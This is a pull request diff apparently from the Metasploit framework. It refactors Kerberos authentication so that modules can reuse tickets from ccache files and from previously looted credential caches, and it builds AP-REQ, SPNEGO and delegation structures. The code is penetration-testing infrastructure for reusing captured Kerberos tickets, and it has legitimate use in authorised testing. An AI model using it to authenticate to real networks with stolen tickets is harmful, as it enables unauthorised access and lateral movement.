### PR TITLE
Kerberos CCache File Reuse

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -6,11 +6,23 @@ module Msf
       module Kerberos
         module Client
           include Msf::Exploit::Remote::Kerberos::Client::Base
+          include Msf::Exploit::Remote::Kerberos::Client::ApRequest
           include Msf::Exploit::Remote::Kerberos::Client::AsRequest
           include Msf::Exploit::Remote::Kerberos::Client::AsResponse
           include Msf::Exploit::Remote::Kerberos::Client::TgsRequest
           include Msf::Exploit::Remote::Kerberos::Client::TgsResponse
           include Msf::Exploit::Remote::Kerberos::Client::Pac
+
+          # https://datatracker.ietf.org/doc/html/rfc4121#section-4.1
+          TOK_ID_KRB_AP_REQ = "\x01\x00"
+          TOK_ID_KRB_AP_REP = "\x02\x00"
+          TOK_ID_KRB_ERROR  = "\x03\x00"
+
+          # https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2
+          NEG_TOKEN_ACCEPT_COMPLETED      = 0
+          NEG_TOKEN_ACCEPT_INCOMPLETE     = 1
+          NEG_TOKEN_REJECT                = 2
+          NEG_TOKEN_REQUEST_MIC           = 3
 
           # @!attribute client
           #   @return [Rex::Proto::Kerberos::Client] The kerberos client

--- a/lib/msf/core/exploit/remote/kerberos/client/ap_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/ap_request.rb
@@ -1,0 +1,64 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module Kerberos
+        module Client
+          module ApRequest
+            # https://datatracker.ietf.org/doc/html/rfc4120#section-5.5.1
+            AP_USE_SESSION_KEY = 0x40000000
+            AP_MUTUAL_REQUIRED = 0x20000000
+
+            def build_service_ap_request(opts = {})
+              authenticator = opts.fetch(:authenticator) do
+                build_authenticator(opts.merge(
+                  subkey: nil,
+                  authenticator_enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::AP_REQ_AUTHENTICATOR
+                ))
+              end
+
+              ap_req_options = 0
+              ap_req_options |= AP_MUTUAL_REQUIRED if mutual_auth
+
+              ap_req = opts.fetch(:ap_req) do
+                build_ap_req(opts.merge(authenticator: authenticator, ap_req_options: ap_req_options))
+              end
+
+              ap_req
+            end
+
+            def encode_gss_kerberos_ap_request(ap_request_asn1)
+              ap_request_mech = wrap_pseudo_asn1(
+                  ::Rex::Proto::Gss::OID_KERBEROS_5,
+                  TOK_ID_KRB_AP_REQ + ap_request_asn1.to_der
+              )
+            end
+
+            # @param [Object] encoded_ap_req The ASN1 KRB_AP_REQ as defined in https://datatracker.ietf.org/doc/html/rfc1964#section-1.1.1
+            # @return [String] SPNEGO GSS Blob
+            def encode_gss_spnego_ap_request(ap_request_asn1)
+              ap_request_mech = encode_gss_kerberos_ap_request(ap_request_asn1)
+
+              OpenSSL::ASN1::ASN1Data.new([
+                ::Rex::Proto::Gss::OID_SPNEGO,
+                OpenSSL::ASN1::ASN1Data.new([
+                  OpenSSL::ASN1::Sequence.new([
+                    OpenSSL::ASN1::ASN1Data.new([
+                      OpenSSL::ASN1::Sequence.new([
+                        ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5
+                      ])
+                    ], 0, :CONTEXT_SPECIFIC),
+                    OpenSSL::ASN1::ASN1Data.new([
+                      OpenSSL::ASN1::OctetString.new(ap_request_mech)
+                    ], 2, :CONTEXT_SPECIFIC)
+                  ])
+                ], 0, :CONTEXT_SPECIFIC)
+              ], 0, :APPLICATION).to_der
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -132,8 +132,13 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   # @return [Hash] The security_blob SPNEGO GSS and TGS session key
   def authenticate(options = {})
     options[:sname] = options.fetch(:sname) { build_spn(options) }
+
     unless options[:credential]
-      options[:credential] = @credential || get_cached_credential(options)
+      if @credential
+        options[:credential] = @credential
+      elsif (options[:credential] = get_cached_credential(options))
+        print_status("#{peer} - Using cached credential for #{options[:credential].server} #{options[:credential].client}")
+      end
     end
 
     if options[:credential]

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -596,35 +596,51 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
   def load_credential_from_file(file_path)
     unless File.readable?(file_path.to_s)
-      wlog("Failed to load ticket cache '#{file_path}' (file not readable)")
+      wlog("Failed to load ticket file '#{file_path}' (file not readable)")
       return nil
     end
 
     begin
       cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(file_path))
     rescue StandardError => e
-      elog("Failed to load ticket cache '#{file_path}' (parsing failed)", error: e)
+      elog("Failed to load ticket file '#{file_path}' (parsing failed)", error: e)
       return nil
     end
 
     sname = build_spn
     now = Time.now.utc
 
-    credential = cache.credentials.find do |credential|
+    cache.credentials.to_ary.each.with_index(1) do |credential, index|
       tkt_start = credential.starttime == Time.at(0).utc ? credential.authtime : credential.starttime
       tkt_end = credential.endtime
 
-      return false unless tkt_start < now && now < tkt_end
-      return false unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
-      return false unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
-      return false unless !@username || @username.casecmp?(credential.client.components.last.to_s)
+      unless tkt_start < now
+        wlog("Filtered credential #{file_path} ##{index} reason: Ticket start time is before now (start: #{tkt_start})")
+        return false
+      end
 
-      true
+      unless now < tkt_end
+        wlog("Filtered credential #{file_path} ##{index} reason: Ticket is expired (expiration: #{tkt_end})")
+        return false
+      end
+
+      unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
+        wlog("Filtered credential #{file_path} ##{index} reason: Realm does not match (realm: #{credential.server.realm})")
+        return false
+      end
+
+      unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
+        wlog("Filtered credential #{file_path} ##{index} reason: SPN does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        return false
+      end
+
+      unless !@username || @username.casecmp?(credential.client.components.last.to_s)
+        wlog("Filtered credential #{file_path} ##{index} reason: username does not match (username: #{credential.client.components.last})")
+        return false
+      end
+
+      return credential
     end
-
-    raise Rex::Proto::Kerberos::Model::Error::KerberosError.new('No usable credentials were found.') unless credential
-
-    credential
   end
 
   # Build a loot info string that can later be used in a lookup.

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -9,17 +9,6 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   include Msf::Auxiliary::Report
   include Rex::Proto::Gss::Asn1
 
-  # https://datatracker.ietf.org/doc/html/rfc4121#section-4.1
-  TOK_ID_KRB_AP_REQ = "\x01\x00"
-  TOK_ID_KRB_AP_REP = "\x02\x00"
-  TOK_ID_KRB_ERROR  = "\x03\x00"
-
-  # https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2
-  NEG_TOKEN_ACCEPT_COMPLETED      = 0
-  NEG_TOKEN_ACCEPT_INCOMPLETE     = 1
-  NEG_TOKEN_REJECT                = 2
-  NEG_TOKEN_REQUEST_MIC           = 3
-
   # @!attribute [r] realm
   #   @return [String] the realm to use
   attr_reader :realm
@@ -57,7 +46,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   attr_reader :framework_module
 
   # @!attribute [r] mutual_auth
-  #   @return [Boolean] whether to use mutual authentication 
+  #   @return [Boolean] whether to use mutual authentication
   attr_reader :mutual_auth
 
   # @!attribute [r] use_gss_checksum
@@ -85,10 +74,6 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   GSS_CONFIDENTIAL  = 16
   GSS_INTEGRITY     = 32
 
-  # https://datatracker.ietf.org/doc/html/rfc4120#section-5.5.1
-  AP_USE_SESSION_KEY = 0x40000000
-  AP_MUTUAL_REQUIRED = 0x20000000
-
   module Delegation
     ALWAYS = 'always' # Always send delegated creds
     NEVER = 'never' # Never send delegated creds
@@ -108,7 +93,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       mutual_auth: false,
       use_gss_checksum: false,
       mechanism: Rex::Proto::Gss::Mechanism::SPNEGO,
-      send_delegated_creds: Delegation::ALWAYS
+      send_delegated_creds: Delegation::ALWAYS,
+      cache_file: nil
   )
     @realm = realm
     @hostname = hostname
@@ -123,6 +109,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @use_gss_checksum = use_gss_checksum
     @mechanism = mechanism
     @send_delegated_creds = send_delegated_creds
+    # the cache file is only use for loading credentials, it is *not* written to
+    @credential = cache_file ? load_credential_from_file(cache_file) : nil
   end
 
   # Returns the target host
@@ -140,14 +128,120 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   end
 
   # @param [Hash] options
+  # @option options [String] :credential An explicit credential object to use for authentication.
   # @return [Hash] The security_blob SPNEGO GSS and TGS session key
   def authenticate(options = {})
+    options[:sname] = options.fetch(:sname) { build_spn(options) }
+    unless options[:credential]
+      options[:credential] = @credential || get_cached_credential(options)
+    end
+
+    if options[:credential]
+      auth_context = authenticate_via_krb5_ccache_credential(options[:credential], options)
+    else
+      auth_context = authenticate_via_kdc(options)
+    end
+
+    auth_context[:sequence_number] = rand(1 << 32) unless auth_context.key?(:sequence_number)
+    ap_request_asn1 = auth_context.delete(:service_ap_request).to_asn1
+
+    mechanism = options.fetch(:mechanism) { self.mechanism }
+    if mechanism == Rex::Proto::Gss::Mechanism::SPNEGO
+      security_blob = encode_gss_spnego_ap_request(ap_request_asn1)
+    elsif mechanism == Rex::Proto::Gss::Mechanism::KERBEROS
+      security_blob = encode_gss_kerberos_ap_request(ap_request_asn1)
+    else
+      raise RuntimeError, "Unknown GSS mechanism: #{mechanism}"
+    end
+    auth_context[:security_blob] = security_blob
+    auth_context
+  end
+
+  def get_message_encryptor(key, client_sequence_number, server_sequence_number)
+    Rex::Proto::Gss::Kerberos::MessageEncryptor.new(key,
+                                            client_sequence_number,
+                                            server_sequence_number,
+                                            is_initiator: true,
+                                            use_acceptor_subkey: true)
+  end
+
+  def parse_gss_init_response(token, session_key, mechanism: 'kerberos')
+    mech_id, encapsulated_token = unwrap_pseudo_asn1(token)
+
+    if mech_id.value == Rex::Proto::Gss::OID_KERBEROS_5.value
+      tok_id = encapsulated_token[0,2]
+      data = encapsulated_token[2, encapsulated_token.length]
+      case tok_id
+      when TOK_ID_KRB_AP_REP
+        ap_req = Rex::Proto::Kerberos::Model::ApRep.decode(data)
+        print_good("#{peer} - Received AP-REQ. Extracting session key...")
+
+        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Mismatching etypes' if session_key.type != ap_req.enc_part.etype
+
+        decrypted = ap_req.decrypt_enc_part(session_key.value)
+
+        result = {
+          ap_rep_subkey: decrypted.subkey,
+          server_sequence_number: decrypted.sequence_number
+        }
+      when TOK_ID_KRB_ERROR
+        krb_err = Rex::Proto::Kerberos::Model::KrbError.decode(data)
+        print_error("#{peer} - Received KRB-ERR.")
+
+        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(res: krb_err)
+      else
+        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, "Unknown token id: #{tok_id.inspect}"
+      end
+    else
+      raise ::NotImplementedError, "Parsing mechtype #{mech_id.value} not supported"
+    end
+
+  end
+
+  def build_gss_ap_req_checksum_value(mutual_auth)
+    # No channel binding
+    channel_binding_info = "\x00" * 16
+    channel_binding_info_len = [channel_binding_info.length].pack('V')
+
+    flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
+    flags |= GSS_MUTUAL if mutual_auth
+
+    flags = [flags].pack('V')
+
+    checksum_val = channel_binding_info_len + channel_binding_info + flags
+
+    checksum = Rex::Proto::Kerberos::Model::Checksum.new(
+      type: Rex::Proto::Gss::KRB_AP_REQ_CHKSUM_TYPE,
+      checksum: checksum_val)
+  end
+
+  # @param [String] security_buffer SPNEGO GSS Blob
+  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
+  def validate_response!(security_blob)
+    gss_api = OpenSSL::ASN1.decode(security_blob)
+    neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
+    supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
+
+    is_success = neg_result == NEG_TOKEN_ACCEPT_COMPLETED &&
+      supported_neg == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value
+
+    raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new('Failed to negotiate Kerberos GSS') unless is_success
+
+    is_success
+  end
+
+  def build_spn(options = {})
+    nil
+  end
+
+  private
+
+  def authenticate_via_kdc(options = {})
     realm = self.realm.upcase
     sname = options.fetch(:sname)
 
     server_name = "krbtgt/#{realm}"
     client_name = username
-    mechanism = options.fetch(:mechanism) { self.mechanism }
 
     ticket_options = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
       [
@@ -236,7 +330,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       tgt_result.decrypted_part.key.value,
       msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
     )
-    path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode)
+    path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode, nil, loot_info(options))
     print_status("#{peer} - TGS MIT Credential Cache saved to #{path}")
 
     tgs_ticket = tgs_res.ticket
@@ -284,18 +378,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       subkey_type: tgt_etype # The AP-REP will come back with this same type of subkey
     )
 
-    ap_request_asn1 = service_ap_request.to_asn1
-    
-    if mechanism == Rex::Proto::Gss::Mechanism::SPNEGO
-      security_blob = encode_gss_spnego_ap_request(ap_request_asn1)
-    elsif mechanism == Rex::Proto::Gss::Mechanism::KERBEROS
-      security_blob = encode_gss_kerberos_ap_request(ap_request_asn1)
-    else
-      raise RuntimeError, "Unknown GSS mechanism: #{mechanism}"
-    end
-
     {
-      security_blob: security_blob,
+      service_ap_request: service_ap_request,
       session_key: tgs_auth.key,
       client_sequence_number: sequence_number
     }
@@ -365,12 +449,42 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     [delegated_tgs_ticket, delegated_tgs_auth]
   end
 
-  def get_message_encryptor(key, client_sequence_number, server_sequence_number)
-    Rex::Proto::Gss::Kerberos::MessageEncryptor.new(key, 
-                                            client_sequence_number, 
-                                            server_sequence_number, 
-                                            is_initiator: true,
-                                            use_acceptor_subkey: true)
+  def authenticate_via_krb5_ccache_credential(credential, _options = {})
+    unless credential.is_a?(Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential)
+      raise TypeError, 'credential must be a Krb5CcacheCredential instance'
+    end
+
+    tgs_auth_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.to_i,
+      value: credential.keyblock.data.to_s
+    )
+    tgs_ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.to_s)
+
+    ## Service Authentication
+
+    sequence_number = rand(1 << 32)
+    service_ap_request = build_service_ap_request(
+      session_key: tgs_auth_key,
+      checksum: use_gss_checksum ? build_gss_ap_req_checksum_value(mutual_auth) : nil,
+      ticket: tgs_ticket,
+      realm: self.realm.upcase,
+      client_name: username,
+      options: Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
+        [
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::FORWARDABLE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::CANONICALIZE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE_OK
+        ]
+      ),
+      sequence_number: sequence_number
+    )
+
+    {
+      service_ap_request: service_ap_request,
+      session_key: tgs_auth_key,
+      client_sequence_number: sequence_number
+    }
   end
 
   def parse_gss_init_response(token, session_key, mechanism: 'kerberos')
@@ -452,65 +566,78 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       checksum: checksum_val)
   end
 
-  def build_service_ap_request(opts = {})
-    authenticator = opts.fetch(:authenticator) do
-      build_authenticator(opts.merge(
-        subkey: nil,
-        authenticator_enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::AP_REQ_AUTHENTICATOR
-      ))
+  # Search the database for a credential object that can be used for authentication.
+  #
+  # @param [Hash] options
+  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
+  # @return [nil] returned if the database is not connected or no usable credentials are found
+  def get_cached_credential(options = {})
+    return nil unless active_db?
+
+    now = Time.now.utc
+    host = report_host(workspace: myworkspace, host: @host)
+    framework.db.loot(workspace: myworkspace, host: host, ltype: 'mit.kerberos.ccache', info: loot_info(options)).each do |stored_loot|
+      ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(stored_loot.data)
+      # at this time Metasploit stores 1 credential per ccache file, so no need to iterate through them
+      credential = ccache.credentials.first
+
+      tkt_start = credential.starttime == Time.at(0).utc ? credential.authtime : credential.starttime
+      tkt_end = credential.endtime
+      return credential if tkt_start < now && now < tkt_end
     end
 
-    ap_req_options = 0
-    ap_req_options |= AP_MUTUAL_REQUIRED if mutual_auth
+    nil
+  end
 
-    ap_req = opts.fetch(:ap_req) do
-      build_ap_req(opts.merge(authenticator: authenticator, ap_req_options: ap_req_options))
+  # Load a credential object from a file for authentication. Credentials in the file will be filtered by multiple
+  # attributes including their timestamps to ensure that the returned credential appears usable.
+  #
+  # @param [String] file_path The file path to load a credential object from
+  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
+  def load_credential_from_file(file_path)
+    unless File.readable?(file_path.to_s)
+      wlog("Failed to load ticket cache '#{file_path}' (file not readable)")
+      return nil
     end
 
-    ap_req
+    begin
+      cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(file_path))
+    rescue StandardError => e
+      elog("Failed to load ticket cache '#{file_path}' (parsing failed)", error: e)
+      return nil
+    end
+
+    sname = build_spn
+    now = Time.now.utc
+
+    credential = cache.credentials.find do |credential|
+      tkt_start = credential.starttime == Time.at(0).utc ? credential.authtime : credential.starttime
+      tkt_end = credential.endtime
+
+      return false unless tkt_start < now && now < tkt_end
+      return false unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
+      return false unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
+      return false unless !@username || @username.casecmp?(credential.client.components.last.to_s)
+
+      true
+    end
+
+    raise Rex::Proto::Kerberos::Model::Error::KerberosError.new('No usable credentials were found.') unless credential
+
+    credential
   end
 
-  # @param [string] security_buffer SPNEGO GSS Blob
-  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
-  def validate_response!(security_blob)
-    gss_api = OpenSSL::ASN1.decode(security_blob)
-    neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
-    supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
+  # Build a loot info string that can later be used in a lookup.
+  #
+  # @param [Hash] options
+  # @return [String] the info string
+  def loot_info(options = {})
+    info = []
 
-    is_success = neg_result == NEG_TOKEN_ACCEPT_COMPLETED &&
-      supported_neg == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value
+    info << "realm: #{self.realm.upcase}" if self.realm
+    info << "serviceName: #{options[:sname].name_string.join('/').downcase}" if options[:sname]
+    info << "username: #{self.username.downcase}" if self.username
 
-    raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new('Failed to negotiate Kerberos GSS') unless is_success
-
-    is_success
-  end
-
-  def encode_gss_kerberos_ap_request(ap_request_asn1)
-    ap_request_mech = wrap_pseudo_asn1(
-        ::Rex::Proto::Gss::OID_KERBEROS_5,
-        TOK_ID_KRB_AP_REQ + ap_request_asn1.to_der
-    )
-  end
-
-  # @param [Object] encoded_ap_req The ASN1 KRB_AP_REQ as defined in https://datatracker.ietf.org/doc/html/rfc1964#section-1.1.1
-  # @return [String] SPNEGO GSS Blob
-  def encode_gss_spnego_ap_request(ap_request_asn1)
-    ap_request_mech = encode_gss_kerberos_ap_request(ap_request_asn1)
-
-    OpenSSL::ASN1::ASN1Data.new([
-      ::Rex::Proto::Gss::OID_SPNEGO,
-      OpenSSL::ASN1::ASN1Data.new([
-        OpenSSL::ASN1::Sequence.new([
-          OpenSSL::ASN1::ASN1Data.new([
-            OpenSSL::ASN1::Sequence.new([
-              ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5
-            ])
-          ], 0, :CONTEXT_SPECIFIC),
-          OpenSSL::ASN1::ASN1Data.new([
-            OpenSSL::ASN1::OctetString.new(ap_request_mech)
-          ], 2, :CONTEXT_SPECIFIC)
-        ])
-      ], 0, :CONTEXT_SPECIFIC)
-    ], 0, :APPLICATION).to_der
+    info.join(', ')
   end
 end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -64,6 +64,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   def_delegators :@framework_module,
                 :print_status,
                 :print_good,
+                :vprint_error,
                 :workspace
 
   # Flags - https://datatracker.ietf.org/doc/html/rfc4121#section-4.1.1.1
@@ -108,6 +109,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @mutual_auth = mutual_auth
     @use_gss_checksum = use_gss_checksum
     @mechanism = mechanism
+    @send_delegated_creds = send_delegated_creds
 
     credential = nil
     if cache_file
@@ -156,7 +158,6 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       auth_context = authenticate_via_kdc(options)
     end
 
-    auth_context[:sequence_number] = rand(1 << 32) unless auth_context.key?(:sequence_number)
     ap_request_asn1 = auth_context.delete(:service_ap_request).to_asn1
 
     mechanism = options.fetch(:mechanism) { self.mechanism }
@@ -167,6 +168,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     else
       raise RuntimeError, "Unknown GSS mechanism: #{mechanism}"
     end
+
     auth_context[:security_blob] = security_blob
     auth_context
   end
@@ -210,23 +212,6 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       raise ::NotImplementedError, "Parsing mechtype #{mech_id.value} not supported"
     end
 
-  end
-
-  def build_gss_ap_req_checksum_value(mutual_auth)
-    # No channel binding
-    channel_binding_info = "\x00" * 16
-    channel_binding_info_len = [channel_binding_info.length].pack('V')
-
-    flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
-    flags |= GSS_MUTUAL if mutual_auth
-
-    flags = [flags].pack('V')
-
-    checksum_val = channel_binding_info_len + channel_binding_info + flags
-
-    checksum = Rex::Proto::Kerberos::Model::Checksum.new(
-      type: Rex::Proto::Gss::KRB_AP_REQ_CHKSUM_TYPE,
-      checksum: checksum_val)
   end
 
   # @param [String] security_buffer SPNEGO GSS Blob
@@ -399,6 +384,106 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     }
   end
 
+  def authenticate_via_krb5_ccache_credential(credential, _options = {})
+    unless credential.is_a?(Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential)
+      raise TypeError, 'credential must be a Krb5CcacheCredential instance'
+    end
+
+    tgs_auth_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.to_i,
+      value: credential.keyblock.data.to_s
+    )
+    tgs_ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.to_s)
+
+    case send_delegated_creds
+    when Delegation::ALWAYS
+      do_delegation = true
+    when Delegation::WHEN_UNCONSTRAINED
+      do_delegation = credential.ticket_flags.include?(Rex::Proto::Kerberos::Model::KdcOptionFlag::OK_AS_DELEGATE)
+    end
+
+    if do_delegation
+      # the cache is currently backed by a looted ccache file (see #authenticate_via_kdc) and the MIT ccache file format
+      # does not have a documented means to store a delegation ticket which is a Microsoft-specific extension
+      wlog('Can not process delegation when using a cached credential at this time')
+    end
+
+    ## Service Authentication
+    checksum = nil
+    checksum = build_gss_ap_req_checksum_value(mutual_auth, nil, nil, nil, nil, nil) if use_gss_checksum
+
+    sequence_number = rand(1 << 32)
+    service_ap_request = build_service_ap_request(
+      session_key: tgs_auth_key,
+      checksum: checksum,
+      ticket: tgs_ticket,
+      realm: self.realm.upcase,
+      client_name: username,
+      options: Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
+        [
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::FORWARDABLE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::CANONICALIZE,
+          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE_OK
+        ]
+      ),
+      sequence_number: sequence_number
+    )
+
+    {
+      service_ap_request: service_ap_request,
+      session_key: tgs_auth_key,
+      client_sequence_number: sequence_number
+    }
+  end
+
+  def build_gss_ap_req_checksum_value(mutual_auth, ticket, decrypted_part, session_key, realm, client_name)
+    # @see https://datatracker.ietf.org/doc/html/rfc4121#section-4.1.1
+    # No channel binding
+    channel_binding_info = "\x00" * 16
+    channel_binding_info_len = [channel_binding_info.length].pack('V')
+
+    flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
+    flags |= GSS_MUTUAL if mutual_auth
+    flags |= GSS_DELEGATE if ticket
+
+    flags = [flags].pack('V')
+
+    checksum_val = channel_binding_info_len + channel_binding_info + flags
+
+    if ticket
+      krb_cred = Rex::Proto::Kerberos::Model::KrbCred.new
+      krb_cred.pvno = 5
+      krb_cred.msg_type = 0x16
+      krb_cred.tickets = [ticket]
+      ticket_info = Rex::Proto::Kerberos::Model::KrbCredInfo.new
+      ticket_info.key = decrypted_part.key
+      ticket_info.prealm = realm
+      ticket_info.pname = build_client_name(client_name: client_name)
+      ticket_info.flags = decrypted_part.flags
+      ticket_info.auth_time = decrypted_part.auth_time
+      ticket_info.start_time = decrypted_part.start_time
+      ticket_info.end_time = decrypted_part.end_time
+      ticket_info.renew_till = decrypted_part.renew_till
+      ticket_info.sname = decrypted_part.sname
+      ticket_info.srealm = decrypted_part.srealm
+
+      enc_part = Rex::Proto::Kerberos::Model::EncKrbCredPart.new
+      enc_part.ticket_info = [ticket_info]
+
+      krb_cred.enc_part = enc_part.encrypt(session_key)
+
+      dlg_opt = [1].pack('v')
+      dlg_val = krb_cred.encode
+      dlg_length = [dlg_val.length].pack('v')
+      checksum_val += dlg_opt + dlg_length + dlg_val
+    end
+
+    checksum = Rex::Proto::Kerberos::Model::Checksum.new(
+      type: Rex::Proto::Gss::KRB_AP_REQ_CHKSUM_TYPE,
+      checksum: checksum_val)
+  end
+
   def request_delegation_ticket(session_key, tgt_ticket, realm, client_name, tgt_etype, expiry_time, now)
     subkey = nil
 
@@ -461,123 +546,6 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     )
 
     [delegated_tgs_ticket, delegated_tgs_auth]
-  end
-
-  def authenticate_via_krb5_ccache_credential(credential, _options = {})
-    unless credential.is_a?(Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential)
-      raise TypeError, 'credential must be a Krb5CcacheCredential instance'
-    end
-
-    tgs_auth_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
-      type: credential.keyblock.enctype.to_i,
-      value: credential.keyblock.data.to_s
-    )
-    tgs_ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.to_s)
-
-    ## Service Authentication
-
-    sequence_number = rand(1 << 32)
-    service_ap_request = build_service_ap_request(
-      session_key: tgs_auth_key,
-      checksum: use_gss_checksum ? build_gss_ap_req_checksum_value(mutual_auth) : nil,
-      ticket: tgs_ticket,
-      realm: self.realm.upcase,
-      client_name: username,
-      options: Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
-        [
-          Rex::Proto::Kerberos::Model::KdcOptionFlag::FORWARDABLE,
-          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE,
-          Rex::Proto::Kerberos::Model::KdcOptionFlag::CANONICALIZE,
-          Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE_OK
-        ]
-      ),
-      sequence_number: sequence_number
-    )
-
-    {
-      service_ap_request: service_ap_request,
-      session_key: tgs_auth_key,
-      client_sequence_number: sequence_number
-    }
-  end
-
-  def parse_gss_init_response(token, session_key, mechanism: 'kerberos')
-    mech_id, encapsulated_token = unwrap_pseudo_asn1(token)
-
-    if mech_id.value == Rex::Proto::Gss::OID_KERBEROS_5.value
-      tok_id = encapsulated_token[0,2]
-      data = encapsulated_token[2, encapsulated_token.length]
-      case tok_id
-      when TOK_ID_KRB_AP_REP
-        ap_req = Rex::Proto::Kerberos::Model::ApRep.decode(data)
-        print_good("#{peer} - Received AP-REQ. Extracting session key...")
-
-        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Mismatching etypes' if session_key.type != ap_req.enc_part.etype
-
-        decrypted = ap_req.decrypt_enc_part(session_key.value)
-        
-        result = {
-          ap_rep_subkey: decrypted.subkey,
